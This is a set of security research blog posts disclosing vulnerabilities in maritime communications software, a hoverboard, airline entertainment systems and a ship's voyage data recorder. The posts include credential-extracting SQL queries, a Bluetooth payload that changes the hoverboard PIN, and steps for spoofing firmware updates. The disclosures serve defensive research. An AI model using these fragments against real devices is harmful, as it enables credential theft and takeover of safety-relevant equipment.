RESEARCH | October 26, 2017

AmosConnect: Maritime Communications Security Has Its Flaws

Satellite communications security has been a target of our research for some time: in 2014 IOActive released a document detailing many vulnerabilities in popular SATCOM systems. Since then we’ve had the opportunity to dive deeper in this area, and learned a lot more about some of the environments in which these systems are in place.

Recently, we saw that Shodan released a new tool that tracks the location of VSAT systems exposed to the Internet. These systems are typically installed in vessels to provide them with internet connectivity while at open sea.


The maritime sector makes use of some of these systems to track and monitor ships’ IT and navigation systems as well as to aid crew members in some of their daily duties, providing them with e-mail or the ability to browse the Internet. Modern vessels don’t differ that much from your typical office these days, aside from the fact that they might be floating in a remote location.

Satellite connectivity is an expensive resource. In order to minimize its cost, several products exist to perform optimizations around the compression of data while in transit. One of the products that caught our eye was AmosConnect.

AmosConnect 8 is a platform designed to work in a maritime environment in conjunction with satellite equipment, providing services such as: 

  • E-mail
  • Instant messaging
  • Position reporting
  • Crew Internet
  • Automatic file transfer
  • Application integration


We have identified two critical vulnerabilities in this software that allow pre-authenticated attackers to fully compromise an AmosConnect server. We have reported these vulnerabilities but there is no fix for them, as Inmarsat has discontinued AmosConnect 8, announcing its end-of-life in June 2017. The original advisory is available here, and this blog post will also discuss some of the technical details.

 

Blind SQL Injection in Login Form
A Blind SQL Injection vulnerability is present in the login form, allowing unauthenticated attackers to gain access to credentials stored in its internal database. The server stores usernames and passwords in plaintext, making this vulnerability trivial to exploit.

The following POST request is sent when a user tries to log into AmosConnect


The parameter data[MailUser][emailAddress] is vulnerable to Blind SQL Injection, enabling data retrieval from the backend SQLite database using time-based attacks.

Attackers that successfully exploit this vulnerability can retrieve credentials to log into the service by executing the following queries:

SELECT key, value from MOBILE_PROPS WHERE key LIKE ‘USER.%.password’;

SELECT key, value from MOBILE_PROPS WHERE key LIKE 

‘USER.%.email_address’;

The authentication method is implemented in mail_user.php:

The call to findByEmail() instantiates a COM object that is implemented in native C++ code.

 

The following C++ native methods are invoked upon execution of the call:
     Neptune::UserManager::User::findByEmai(…)
          Neptune::ConfigManager::Property::findBy( … )
               Neptune::ConfigManager::Property::findAllBy( … )
The vulnerable code is implemented in Neptune::ConfigManager::Property::findAllBy() as seen below:

 

 

Strings are concatenated in an insecure manner, building a SQL query that in this case would look like:
“[…] deleted = 0 AND key like ‘USER.%.email_address’ AND upper(value) like ‘{email}'”

 

Privileged Backdoor Account

The AmosConnect server features a built-in backdoor account with full system privileges. Among other things, this vulnerability allows attackers to execute commands with SYSTEM privileges on the remote system by abusing AmosConnect Task Manager.
 
Users accessing the AmosConnect server see the following login screen:
 
The login website reveals the Post Office ID, this ID identifies the AmosConnect server and is tied to the software license.
 
The following code belongs to the authentication method implemented in mail_user.php. Note the call to authenticateBackdoorUser():
 
authenticateBackdoorUser() is implemented as follows:
 
 
The following code snippet shows how an attacker can obtain the SysAdmin password for a given Post Office ID:
Conclusions and thoughts
Vessel networks are typically segmented and isolated from each other, in part for security reasons. A typical vessel network configuration might feature some of the following subnets:
·         Navigation systems network. Some of the most recent vessels feature “sail-by-wire” technologies; the systems in charge of providing this technology are located in this network.
·         Industrial Control Systems (ICS) network. Vessels contain a lot of industrial machinery that can be remotely monitored and operated. Some vessels feature a dedicated network for these systems; in some configuration, the ICS and Navigation networks may actually be the same.
·         IT systems network. Vessels typically feature a separate network to support office applications. IT servers and crew members’ work computers are connected to this network; its within this network that AmosConnect is typically deployed.
·         Bring-Your-Own-Device networks. Vessels may feature a separate network to provide internet connectivity to guests or crew members personal devices.
·         SATCOM. While this may change from vessel to vessel, some use a separate subnet to host satellite communications equipment.
While the vulnerabilities discussed in this blog post may only be exploited by an attacker with access to the IT systems network, its important to note that within certain vessel configurations some networks might not be segmented, or AmosConnect might be exposed to one or more of these networks. A typical scenario would make AmosConnect available to both the BYOD “guest and IT networks; one can easily see how these vulnerabilities could be exploited by a local attacker to pivot from the guest network to the IT network. Also, some the vulnerabilities uncovered during our SATCOM research might enable attackers to access these systems via the satellite link.
 
All in all, these vulnerabilities pose a serious security risk. Attackers might be able to obtain corporate data, take over the server to mount further attacks or pivot within the vessel networks.
References:
https://shiptracker.shodan.io/
RESEARCH | July 19, 2017

Multiple Critical Vulnerabilities Found in Popular Motorized Hoverboards

Not that long ago, motorized hoverboards were in the news – according to widespread reports, they had a tendency to catch on fire and even explode. Hoverboards were so dangerous that the National Association of State Fire Marshals (NASFM) issued a statement recommending consumers “look for indications of acceptance by recognized testing organizations” when purchasing the devices. Consumers were even advised to not leave them unattended due to the risk of fires. The Federal Trade Commission has since established requirements that any hoverboard imported to the US meet baseline safety requirements set by Underwriters Laboratories.

Since hoverboards were a popular item used for personal transportation, I acquired a Ninebot by Segway miniPRO hoverboard in September of 2016 for recreational use. The technology is amazing and a lot of fun, making it very easy to learn and become a relatively skilled rider.

The hoverboard is also connected and comes with a rider application that enables the owner to do some cool things, such as change the light colors, remotely control the hoverboard, and see its battery life and remaining mileage. I was naturally a little intrigued and couldn’t help but start doing some tinkering to see how fragile the firmware was. In my past experience as a security consultant, previous well-chronicled issues brought to mind that if vulnerabilities do exist, they might be exploited by an attacker to cause some serious harm.

When I started looking further, I learned that regulations now require hoverboards to meet certain mechanical and electrical specifications with the goal of preventing battery fires and various mechanical failures; however, there are currently no regulations aimed at ensuring firmware integrity and validation, even though firmware is also integral to the safety of the system.

Let’s Break a Hoverboard

Using reverse engineering and protocol analysis techniques, I was able to determine that my Ninebot by Segway miniPRO (Ninebot purchased Segway Inc. in 2015) had several critical vulnerabilities that were wirelessly exploitable. These vulnerabilities could be used by an attacker to bypass safety systems designed by Ninebot, one of the only hoverboards approved for sale in many countries.

Using protocol analysis, I determined I didn’t need to use a rider’s PIN (Personal Identification Number) to establish a connection. Even though the rider could set a PIN, the hoverboard did not actually change its default pin of “000000.” This allowed me to connect over Bluetooth while bypassing the security controls. I could also document the communications between the app and the hoverboard, since they were not encrypted.

Additionally, after attempting to apply a corrupted firmware update, I noticed that the hoverboard did not implement any integrity checks on firmware images before applying them. This means an attacker could apply any arbitrary update to the hoverboard, which would allow them to bypass safety interlocks.

Upon further investigation of the Ninebot application, I also determined that connected riders in the area were indexed using their smart phones’ GPS; therefore, each riders’ location is published and publicly available, making actual weaponization of an exploit much easier for an attacker.

To show how this works, an attacker using the Ninebot application can locate other hoverboard riders in the vicinity:

 

An attacker could then connect to the miniPRO using a modified version of the Nordic UART application, the reference implementation of the Bluetooth service used in the Ninebot miniPRO. This application allows anyone to connect to the Ninebot without being asked for a PIN.By sending the following payload from the Nordic application, the attacker can change the application PIN to “111111”:
unsigned char payload[13] =
{0x55, 0xAA, 0x08, 0x0A, 0x03, 0x17, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0xAD, 0xFE}; // Set The Hoverboard Pin to “111111”

 

Figure 1 – miniPRO PIN Theft


Using the pin “111111,” the attacker can then launch the Ninebot application and connect to the hoverboard. This would lock a normal user out of the Ninebot mobile application because a new PIN has been set.

Using DNS spoofing, an attacker can upload an arbitrary firmware image by spoofing the domain record for apptest.ninebot.cn. The mobile application downloads the image and then uploads it to the hoverboard:

In http://apptest.ninebot.cn change the /appversion/appdownload/NinebotMini/version.json file to match your new firmware version and size. The example below forces the application to update the control/mainboard firmware image (aka driver board firmware) to v1.3.3.7, which is 50212 bytes in size.

“CtrlVersionCode”:[“1337″,”50212”]

Create a matching directory and file including the malicious firmware (/appversion/appdownload/NinebotMini/v1.3.3.7/Mini_Driver_v1.3.3.7.zip) with the modified update file Mini_Driver_V1.3.3.7.bin compressed inside of the firmware update archive.


When launched, the Ninebot application checks to see if the firmware version on the hoverboard matches the one downloaded from apptest.ninebot.cn. If there is a later version available (that is, if the version in the JSON object is newer than the version currently installed), the app triggers the firmware update process.

Analysis of Findings
Even though the Ninebot application prompted a user to enter a PIN when launched, it was not checked at the protocol level before allowing the user to connect. This left the Bluetooth interface exposed to an attack at a lower level. Additionally, since this device did not use standard Bluetooth PIN-based security, communications were not encrypted and could be wirelessly intercepted by an attacker.

Exposed management interfaces should not be available on a production device. An attacker may leverage an open management interface to execute privileged actions remotely. Due to the implementation in this scenario, I was able to leverage this vulnerability and perform a firmware update of the hoverboard’s control system without authentication.

Firmware integrity checks are imperative in embedded systems. Unverified or corrupted firmware images could permanently damage systems and may allow an attacker to cause unintended behavior. I was able to modify the controller firmware to remove rider detection, and may have been able to change configuration parameters in other onboard systems, such as the BMS (Battery Management System) and Bluetooth module.

 Figure 2 Unencrypted Communications between
Hoverboard and Android Application


Figure 3 – Interception of Android Application Setting PIN Code to “111111”
 
Mitigation
As a result of the research, IOActive made the following security design and development recommendations to Ninebot that would correct these vulnerabilities:
  • Implement firmware integrity checking.
  • Use Bluetooth Pre-Shared Key authentication or PIN authentication.
  • Use strong encryption for wireless communications between the application and hoverboard.
  • Implement a “pairing mode” as the sole mode in which the hoverboard pairs over Bluetooth.
  • Protect rider privacy by not exposing rider location within the Ninebot mobile application. 

IOActive recommends that end users stay up-to-date with the latest versions of the app from Ninebot. We also recommend that consumers avoid hoverboard models with Bluetooth and wireless capabilities.

Responsible Disclosure
After completing the research, IOActive subsequently contacted and disclosed the details of the vulnerabilities identified to Ninebot. Through a series of exchanges since the initial contact, Ninebot has released a new version of the application and reported to IOActive that the critical issues have been addressed.

  • December 2016: IOActive conducts testing on Ninebot by Segway miniPro hoverboard.
  • December 24, 2016: Ioactive contacts Ninebot via a public email address to establish a line of communication.
  • January 4, 2017: Ninebot responds to IOActive.
  • January 27, 2017: IOActive discloses issues to Ninebot.
  • April 2017: Ninebot releases an updated application (3.20), which includes fixes that address some of IOActive’s findings.
  • April 17, 2017: Ninebot informs IOActive that remediation of critical issues is complete.
  • July 19, 2017: IOActive publishes findings.
For more information about this research, please refer to the following additional materials:
RESEARCH | December 20, 2016

In Flight Hacking System

In my five years with IOActive, I’ve had the opportunity to visit some awesome places, often thousands of kilometers from home. So flying has obviously been an integral part of my routine. You might not think that’s such a big deal, unless like me, you’re afraid of flying. I don’t think I can completely get rid of that anxiety; after dozens of flights my hands still sweat during takeoff, but I’ve learned to live with it, even enjoying it sometimes…and spending some flights hacking stuff.

What helped a lot to reduce that fear was to understand how things work in planes, and getting used to noises, bumps, and turbulence. This blog post is  about understanding a bit more about how things work aboard an aircraft. More specifically, the In-Flight Entertainment Systems (IFE) developed by Panasonic Avionics.

While I was flying from Warsaw to Dubai two years ago, I decided to try my luck and play with the IFE a little bit, touching this and that. Suddenly, after touching a specific point in one of the screen’s upper corners, the device returned this debug information: 

 
—-
Interactive: ek_seatappbase_1280x768_01.01.18.01.cram
Content: ek_seatappcontent_1280x768.01.01.8.01.cram
Engine: qtengine_01.14.0.01.squash
LRU Type: 196 2
IP: 172.17.148.48

 

Media Player Auto Popup Enabled: false
—–
After arriving in Dubai and spending some time searching those keywords in Google, I discovered hundreds of publicly available firmware updates for multiple airlines:

 

These files were obviously being actively updated, so it was possible to gain access to the latest versions deployed on aircraft. Today the files are still there, although the directory listing is no longer available.

The airlines I was able to find firmware updates available for included:

  • Emirates
  • AirFrance
  • Aerolineas Argentinas
  • United
  • Virgin
  • Singapore
  • FinnAir
  • Iberia
  • Etihad
  • Qatar
  • KLM
  • American Airlines
  • Scandinavian 
An IFE follows this basic architecture:
System Control Unit (SCU)

This needs to be a certified airborne server. Passengers can access real-time information about the flight, such as wind speed, latitude, longitude, altitude, and outside temperature. The SCU receives all of these values via the avionics bus (usually ARINC 429) and makes them available for the Seat Display Unit (SDU) through an Ethernet connection.

Seat Display Unit (SDU)
This LRU (Linear Replaceable Unit) allows the passenger to consume passive and active functions implemented in the IFE, such as watching movies, buying items, reading articles, or connecting to the internet. It’s basically an embedded device with a touchscreen; the newest are based on Android, while legacy devices mainly use Linux.

 
Removing an SDU – this is a Rave AIX SDU shown, not a Panasonic Avionics model(source: http://airfax.com/blog/wp-content/uploads/2012/06/RAVE_AIX_2012.jpg)
 
Personal Control Unit (PCU)
This handset is optional. The PCU can control the SDU, and as I’ll cover later, it can also act as a credit card reader.Cabin Crew Panel
Flight attendants and other crew members use these units to control features of the aircraft such as lights, actuators (including beds), announcements, onboard shopping, or the PA system, in order to attend to passenger needs. The Cabin Management System (CMS) is normally integrated with the IFE. Panasonic Avionics integrates the aircraft’s CMS and inflight entertainment (IFE) systems with the Global Communications Services, featuring shared system functionality for simple operation by the cabin crew (see https://www.panasonic.aero/inflight-systems/cabin-systems/). The IFE CrewApp is accessible from the Cabin Crew Panel.Panasonic IFE
There are multiple Panasonic IFEs: the “legacy” 3000/3000i and the newest XSeries eFX, eX2 and eX3 (Android-based). Hardware may vary among them, but they have a similar architecture and some common features.You can find more details on these IFEs from the Panasonic Avionics website at https://www.panasonic.aero.These systems support a large range of personalization features, which allow airlines to deploy tailored IFEs while the code base remains pretty much the same.My analysis of the firmware files did not clearly reveal the approach used to perform the data loading on the ground. Usually IFEs perform content updates via Wi-Fi ad-hoc networks or high-speed mobile data links once the aircraft touches down. Panasonic Avionics IFEs are mostly updated over “sneakernet.” While in flight, satellite communications or custom mobile data links are also possible. However, in most cases IFEs operate offline, with their contents preloaded. Usually the IFE doesn’t even check credit cards in real time.The Panasonic Avionics IFE follows a client-server architecture with three main components
  • CrewApp
  • SeatApp
  • Backend  

I found multiple versions of the CrewApp and SeatApp on the aforementioned website. When searching in Google for certain keywords, I also found the source code of the backend to be publicly exposed, but on a different .aero website. Although it contains the custom features and data for specific airlines, it still uses the Panasonic backend codebase.

It is impossible to cover all of the variations in a single blog post, as each airline and other companies adapt and extend the Panasonic framework to its own needs, so we will focus on specific features.

 
The Linux-based SeatApp rebooting
 

The firmware files (in this case software that runs on a device the user does not maintain) that I could analyze did not contain the complete system, just the files that should be updated. That’s a pity, because otherwise we could acquire more details on the low-level workings of those devices. However, it is possible to get some interesting details by going through the available files.

Scripts

Panasonic Avionics has implemented its own declarative script language, used to extend and interface with the GUI and features of the main application. It supports dozens of commands that cover the entire range of functionalities.

Example core/startup.txt code
 

Reverse-engineering the main binary (airsurf), we can figure out how this script format’s parser works. In order to illustrate this approach, let’s look at #define.

The script is processed line-by-line, and when the parser detects a #define statement, it tries to parse the statement at sub_80C2690.

 

In this function there are five types that can be defined: flash, text, draw, timer, and value.

The first line of the script is a #define value, so let’s look at how it’s handled.

First, the line is parsed and the name of the define extracted. Then the parser checks to see whether the value that comes after (the green basic block below) is a number (blue basic block).

 
 If the value is not a number, it is checked against a series of variables. If the number matches, it’s expanded to its value.
 
 
If the value is a number, the name/value pair will be added to a global array of defines (the blue basic block below).
 
 
For the cmd statement, the binary traverses the cmd table and invokes the associated routine, passing parameters.
We can see some interesting functionalities here, such as the routine that reads the credit card data from the handset after swiping. 
Data coming from the card reader (/dev/ccr) is parsed, and tracks printed out and validated.
 

We can also see regular files here, such as shell scripts, configuration files (containing hardcoded credentials), databases, resources, and libraries.

I found the following information in a tweet from someone who captured the Panasonic IFE rebooting. The SeatAppBase files are the same files we are dealing with:

‘loadlru.h’
On the newest X Series IFEs, Panasonic switched to Android and moved from the old .txt script mode approach to QT QML:
 
 
The backend uses PHP. The initial analysis reveals that it had vulnerabilities:

The image above belongs to the “seat-2-seat” chat functionality, where passengers can send messages to others. It shouldn’t take long for you to figure out there is something wrong, and it’s not the only problem.

The following videos show real vulnerability tests performed in such a way that they presented no risk.


1. Bypass credit card check

 

2. Arbitrary file access (so /dev/random)

3. SQL injection

 

Potential Impacts

So how far can an attacker go by chaining and exploiting vulnerabilities in an In-Flight Enterntainment system? There’s no generic response to this, but let’s try to dissect some potential general case scenarios by introducing some additional context (nonspecific to a particular company or system unless stated).

Relying exclusively on the DO-178B standard that defines Software Considerations in Airborne Systems and Equipment Certification, the IFE would technically lie within the D and E levels. Panasonic Avionics’ IFE in particular is certified at Level E. This basically means that even if the entire system fails, the impact would be something between no effect at all and passenger discomfort.

Also,  I should mention that an aircraft’s data networks are divided into four domains, depending on the kind of data they process: passenger entertainment, passenger owned devices, airline information services, and finally aircraft control.

Physical control systems should be located in the Aircraft Control domain, which should be physically isolated from the passenger domains; however, this doesn’t always happen. Some aircraft use optical data diodes, while others rely upon electronic gateway modules. This means that as long as there is a physical path that connects both domains, we can’t disregard the potential for attack.

In-flight entertainment systems may be an attack vector. In some scenarios such an attack would be physically impossible due to the isolation of these systems, while in others an attack remains theoretically feasible due to the physical connectivity. IOActive has successfully compromised other electronic gateway modules in non-airborne vehicles. The ability to cross the “red line” between the passenger entertainment and owned devices domain and the aircraft control domain relies heavily on the specific devices, software and configuration deployed on the target aircraft.

In 2014 we presented a series of vulnerabilities in Satellite Communication (SATCOM) devices, including airborne SATCOM terminals. A primary concern is the sharing of these SATCOM devices between different data domains, which could allow an attacker to use this equipment to pivot from a compromised IFE to certain avionics.

On the IT side, compromising the IFE means an attacker can control how passengers are informed aboard the plane. For example, an attacker might spoof flight information values such as altitude or speed, and show a bogus route on the interactive map. An attacker might compromise the CrewApp unit, controlling the PA, lighting, or actuators for upper classes. If all of these attacks are chained, a malicious actor may create a baffling and disconcerting situation for passengers.

The capture of personal information, including credit card details, while not in scope of this research, would also be technically possible if backends that sometimes provide access to specific airlines’ frequent-flyer/VIP membership data were not configured properly.

On the bright side, while not in scope of the Panasonic Avionics IFE systems research, I believe in-flight Wi-Fi itself is not a problem because it can be implemented securely without safety and security risks.

What all of this means is that after initial analysis we do not believe these systems can resist solid attacks from skilled malicious actors. Airlines must be vigilant when it comes to their In-Flight Entertainment Systems, ensuring that these and other systems are properly segregated and each aircraft’s security posture is carefully analyzed case by case. The responsibility for security does not solely rest with an IFE manufacturer, an aircraft manufacturer, or the fleet operator. Each plays an important role in assuring a secure environment.

Responsible disclosure

We reported these findings to Panasonic Avionics in March 2015. We believe that has been enough time to produce and deploy patches, at least for the most prominent vulnerabilities. That said, we believe that in such a heterogenous environment, with dozens of airlines involved and hundreds of versions of the software available, it’s difficult to say whether these issues have been completely resolved. 

As always, we would love to hear from other security types who might have a differing opinion. All of our positions are subject to change through exposure to compelling arguments and/or data.

RESEARCH | December 9, 2015

Maritime Security: Hacking into a Voyage Data Recorder (VDR)

In 2014, IOActive disclosed a series of attacks that affect multiple SATCOM devices, some of which are commonly deployed on vessels. Although there is no doubt that maritime assets are valuable targets, we cannot limit the attack surface to those communication devices that vessels, or even large cruise ships, are usually equipped with. In response to this situation, IOActive provides services to evaluate the security posture of the systems and devices that make up the modern integrated bridges and engine rooms found on cargo vessels and cruise ships. [1]

 

There are multiple facilities, devices, and systems located on ports and vessels and in the maritime domain in general, which are crucial to maintaining safe and secure operations across multiple sectors and nations.

 

Port security refers to protecting all of these assets from acts of piracy, terrorism, and other unlawful activities, such as smuggling. Recent activity appears to demonstrate that cyberattacks against this sector may have been underestimated. As threats evolve, procedures and policies must improve to take these new attack scenarios into account. For example,https://www.federalregister.gov/articles/2014/12/18/2014-29658/guidance-on-maritime-cybersecurity-standards

 

This blog post describes IOActive’s research related to one type of equipment usually present in vessels, Voyage Data Recorders (VDRs). In order to understand a little bit more about these devices, I’ll detail some of the internals and vulnerabilities found in one of these devices, the Furuno VR-3000.

 

What is a Voyage Data Recorder?

(http://www.imo.org/en/OurWork/Safety/Navigation/Pages/VDR.aspx ) A VDR is equivalent to an aircraft’s ‘BlackBox’. These devices record crucial data, such as radar images, position, speed, audio in the bridge, etc. This data can be used to understand the root cause of an accident.

 

Real Incidents

Several years ago, piracy acts were on the rise. Multiple cases were reported almost every day. As a result, nation-states along with fishing and shipping companies decided to protect their fleet, either by sending in the military or hiring private physical security companies.

On February 15, 2012, two Indian fishermen were shot by Italian marines onboard the Enrica merchant vessel, who supposedly opened fire thinking they were being attacked by pirates. This incident caused a serious diplomatic conflict between Italy and India, which continues to the present. https://en.wikipedia.org/wiki/Enrica_Lexie_case

 

‘Mysteriously’, the data collected from the sensors and voice recordings stored in the VDR during the hours of the incident was corrupted, making it totally unusable for authorities to use during their investigation.  As this story, from Indian Times, mentions the VDR could have provided authorities with crucial clues to figure out what really happened.

 

Curiously, Furuno was the manufacturer of the VDR that was corrupted in this incident. This Kerala High Court’s document covers this fact: http://indiankanoon.org/doc/187144571/ However, we cannot say whether the model Enrica Lexie was equipped with was the VR-3000. Just as a side note, the vessel was built in 2008 and the Furuno VR-3000 was apparently released in 2007.

 

Just a few weeks later, on March 1, 2012, the Singapore-flagged cargo ship MV. Prabhu Daya was involved in a hit-and-run incident off the Kerala Coast. As a result, three fishermen were killed and one more disappeared and was eventually rescued by a fishing vessel in the area. Indian authorities initiated an investigation of the accident that led to the arrest of the MV. Prabhu Daya’s captain.

During that process, an interesting detail was reported in several Indian newspapers.

http://www.thehindu.com/news/national/tamil-nadu/voyage-data-recorder-of-prabhu-daya-may-have-been-tampered-with/article2982183.ece

 

So, What’s Going on Here?

From a security perspective, it seems clear VDRs pose a really interesting target. If you either want to spy on a vessel’s activities or destroy sensitive data that may put your crew in a difficult position, VDRs are the key.

 

Understanding a VDR’s internals can provide authorities, or third-parties, with valuable information when performing forensics investigations. However, the ability to precisely alter data can also enable anti-forensics attacks, as described in the real incident previously mentioned.

 

As usual, I didn’t have access to the hardware; but fortunately, I played some tricks and found both firmware and software for the target VDR. The details presented below are exclusively based on static analysis and user-mode QEMU emulation (already explained in a previous blog post). [2]
 
Figure: Typical architecture of a VR-3000

 

Basically, inside the Data Collecting Unit (DCU) is a Linux machine with multiple communication interfaces, such as USB, IEEE1394, and LAN. Also inside the DCU, is a backup HDD that partially replicates the data stored on the Data Recording Unit (DRU). The DRU is protected against aggressions in order to survive in the case of an accident. It also contains a Flash disk to store data for a 12 hour period. This unit stores all essential navigation and status data such bridge conversations, VHF communications, and radar images.

 

The International Maritime Organization (IMO) recommends that all VDR and S-VDR systems installed on or after 1 July 2006 be supplied with an accessible means for extracting the stored data from the VDR or S-VDR to a laptop computer. Manufacturers are required to provide software for extracting data, instructions for extracting data, and cables for connecting between a recording device and computer.

 

The following documents provide more detailed information:
After spending some hours reversing the different binaries, it was clear that security is not one of its main strengths of this equipment. Multiple services are prone to buffer overflows and command injection vulnerabilities. The mechanism to update firmware is flawed. Encryption is weak. Basically, almost the entire design should be considered insecure.
 

Take this function, extracted from from the Playback software, as an example of how not to perform authentication. For those who are wondering what ‘Encryptor’ is, just a word: Scytale.

 

Digging further into the binary services we can find a vulnerability that allows unauthenticated attackers with remote access to the VR-3000 to execute arbitrary commands with root privileges. This can be used to fully compromise the device. As a result, remote attackers are able to access, modify, or erase data stored on the VDR, including voice conversations, radar images, and navigation data.

VR-3000’s firmware can be updated with the help of Windows software known as ‘VDR Maintenance Viewer’ (client-side), which is proprietary Furuno software.

 

The VR-3000 firmware (server-side) contains a binary that implements part of the firmware update logic: ‘moduleserv’

 

This service listens on 10110/TCP.

 

Internally, both server (DCU) and client-side (VDR Maintenance Viewer, LivePlayer, etc.) use a proprietary session-oriented, binary protocol. Basically, each packet may contain a chain of ‘data units’, which, according to their type, will contain different kinds of data.

 

Figure: Some of the supported commands
‘moduleserv’ several control messages intended to control the firmware upgrade process. Let’s analyze how it handles a ‘SOFTWARE_BACKUP_START’ request:
An attacker-controlled string is used to build a command that will be executed without being properly sanitized. Therefore, this vulnerability allows remote unauthenticated attackers to execute arbitrary commands with root privileges.
Figure: ‘Moduleserv’ v2.54 packet processing
Figure: ‘Moduleserv’ v2.54 unsanitized system call

 

At this point, attackers could modify arbitrary data stored on the DCU in order to, for example, delete certain conversations from the bridge, delete radar images, or alter speed or position readings. Malicious actors could also use the VDR to spy on a vessel’s crew as VDRs are directly connected to microphones located, at a minimum, in the bridge.

 

However, compromising the DCU is not enough to cover an attacker’s tracks, as it only contains a backup HDD, which is not designed to survive extreme conditions. The key device in this anti-forensics scenario would be the DRU. The privileged position gained by compromising the DCU would allow attackers to modify/delete data in the DRU too, as this unit is directly connected through an IEEE1394 interface. The image below shows the structure of the DRU.
Figure: Internal structure of the DRU

Before IMO’s resolution MSC.233(90) [3], VDRs did not have to comply with security standards to prevent data tampering. Taking into account that we have demonstrated these devices can be successfully attacked, any data collected from them should be carefully evaluated and verified to detect signs of potential tampering.

 

IOActive, following our responsible disclosure policy, notified the CERT/CC about this vulnerability in October 2014. The CERT/CC, working alongside the JPCERT/CC, were in contact with Furuno and were able to reproduce and verify the vulnerability. Furuno committed to providing a patch for their customers “sometime in the year of 2015.” IOActive does not have further details on whether a patch has been made available.
 
References
————–

EDITORIAL | March 24, 2015

Lawsuit counterproductive for automotive industry

It came to my attention that there is a lawsuit attempting to seek damages against automakers revolving around their cars being hackable.

The lawsuit cites Dr. Charlie Miller’s and my work several times, along with several other researchers who have been involved in automotive security research.

I’d like to be the first to say that I think this lawsuit is unfortunate and subverts the spirit of our research. Charlie and I approached our work with the end goals of determining if technologically advanced cars could be controlled with CAN messages and informing the public of our findings. Obviously, we found this to be true and were surprised at how much could be manipulated with network messages. We learned so much about automobiles, their communications, and their associated physical actions.

Our intent was never to insinuate deliberate negligence on the part of the manufacturers. Instead, like most security researchers, we wanted to push the boundaries of what was thought to be possible and have fun doing it. While I do believe there is risk associated with vehicle connectivity, I think that a lawsuit can only be harmful as it has the potential to take funds away from what is really important:  securing the modern vehicle. I think any money automobile manufacturers must spend on legal fees would be more wisely spent on researching and developing automotive intrusion detection/prevention systems.

The automotive industry is not sitting idly by, but constantly working to improve the security of their past, present, and future vehicles. Security isn’t something that changes overnight, especially in the case of automobiles, which take even longer since there are both physical and software elements to be tested. Offensive security researchers will always be ahead of the people trying to formulate defenses, but that does not mean the defenders are not doing anything.

While our goals were public awareness and industry change, we did not want change to stem from the possible exploitation of public fears. Our hope was that by showing what is possible, we could work with the people who make the products we use and love on an everyday basis to improve vehicle security.

– cv

EDITORIAL | January 27, 2015

Life in the Fast Lane

Hi Internet Friends,
Chris Valasek here. You may remember me from educational films such as “Two Minus Three Equals Negative Fun”. If you have not heard, IOActive officially launched our Vehicle Security Service offering.
I’ve received several questions about the service and plan to answer them and many more during a webinar I am hosting on February 5, 2015 at 11 AM EST.
Some of the main talking points include: 
  • Why dedicate an entire service offering to vehicles and transportation?
  • A brief history of vehicle security research and why it has been relatively scarce
  • Why we believe that protecting vehicles and their supporting systems is of the utmost importance
  • IOActive’s goals for our Vehicle Security Service offering

Additionally, I’ll make sure to save sufficient time for Q&A to field your questions. I’d love to get as many questions as possible, so don’t be shy.

I look forward to your participation in the webinar on February 5,2015 11 AM EST. 

– cv
RESEARCH | September 18, 2014

A Dirty Distillation of Proposed V2V Readiness

Good Afternoon Internet
Chris Valasek here. You may remember me from such automated information kiosks as “Welcome to Springfield Airport”, and “Where’s Nordstrom?” Ever since Dr. Charlie Miller and I began our car hacking adventures, we’ve been asked about the upcoming Vehicle-to-Vehicle (V2V) initiative and haven’t had much to say because we only knew about the technology in the abstract. 

 

I finally decided to read the proposed documentation from the National Highway Traffic Safety Administration (NHTSA) titled: “Vehicle-to-Vehicle Communications: Readiness of V2V Technology for Application” (/wp-content/uploads/2014/09/Readiness-of-V2V-Technology-for-Application-812014.pdf). This is my distillation of a very small portion of the 327-page document. 

While there are countless pages of information regarding cost, crash statistics, consumer acceptance, policy, legal liability, and fuel economy, as a breaker of things, I was most interested in any technical information I could extract. In this blog post, I list some interesting bits I stumbled upon when reading the document. I skipped over huge portions I felt weren’t applicable to my investigation. Mainly anything that didn’t have to do with a purely technical implementation. In addition, any diagrams or pictures in this blog post were taken directly from “Vehicle-to-Vehicle Communications: Readiness of V2V Technology for Application”. 
 
A Very Brief History
 
Although currently a hot topic in the automotive world, the planning, design, and testing of the V2V infrastructure started over 11 years ago. It has gone from special purpose lanes in San Diego to a wireless infrastructure designed to be transparent to the end user. For those not in the know, a pilot program was deployed in Ann Arbor, MI from August 2012 to February 2014. This isn’t a harebrained scheme to a long-standing problem, but has been thought about and fine-tuned for quite some time. 
 
Overview
 
The V2V system is designed (obviously) to reduce death, injuries, and economic loss from motor vehicle crashes. Many people, including me, didn’t realize this initial proposal is only designed to provide visual and audible warnings to the driver and DOES NOT include or plan for physical alterations of the automobile based on V2V communications. For example, the V2V system will not brake a car in the event of an impending accident, but only warn the driver to apply the brake (although V2V could be used by current in-car systems, such as Collision Avoidance, to augment their functionality). 
 
The main components: 
 
Forward Collision Warning (FCW) – Warns you if you’re about to smash into something in front of you.
 
Emergency Electronic Brake Lights – Warns you when the person in front of you is slowing down while you’re reading your Twitter feed. 
 
Do Not Pass Warning – Really for unintentional drift more than you trying to push the limit to pass that big rig on the left side of the dotted line.
 
Left Turn Assist (LTA) — Warns you if there is a car coming when making a left turn. 
 
Intersection Movement Assist (IMA) – Figuring out how not to smash into several different cars at a 4-way intersection is hard, let’s go shopping!
 
Blind Spot Warning + Lane Change Warning – Warns you if you’re about to smash into something while changing lanes. No more “Rubbin is racin” I guess. 
This picture gives you a better idea of some of the scenarios mentioned above. 
 
 
You’ll notice that none of the safety mechanisms mentioned earlier involve performing any physical actions on the automobile. The designers of the V2V system realize that false positives could be a huge problem with warnings. Just imagine how scared people would be if their automobile braked or steered without cause in an attempt to protect them. 
 
Notable Items: 
  • The document predicts it will take 37 years for V2V to penetrate an entire fleet.
  • Rear and Forward Collision Warnings appear to be capable of saving the most money.
  • NHSTA does not expect an immediate difference, due to lack of adoption, but hopes to gain ground as time goes on.
 
My Thoughts
 
All these features seem like they will greatly increase vehicle and passenger safety. My one concern is a whole V2V infrastructure is being developed without much thought given to the physical control of a vehicle. It seems like the next logical step is to not only warn drivers if they are about to collide, but to prevent it. Maybe this will always be left up to the manufacturer, maybe not. 
 
Components/Terms
 
On Board Equipment (OBE) – The device in your car that will communicate with the V2V infrastructure. It will either be OEM (put there by the manufacturer) or aftermarket (sold separately from the car, mobile phone, standalone device, and so on). 
 
Road Side Equipment (RSE) – These devices will connect to the vehicles around them. They can be on road curves that warn the car about its speed, traffic lights, stop signs, and so on. 
 
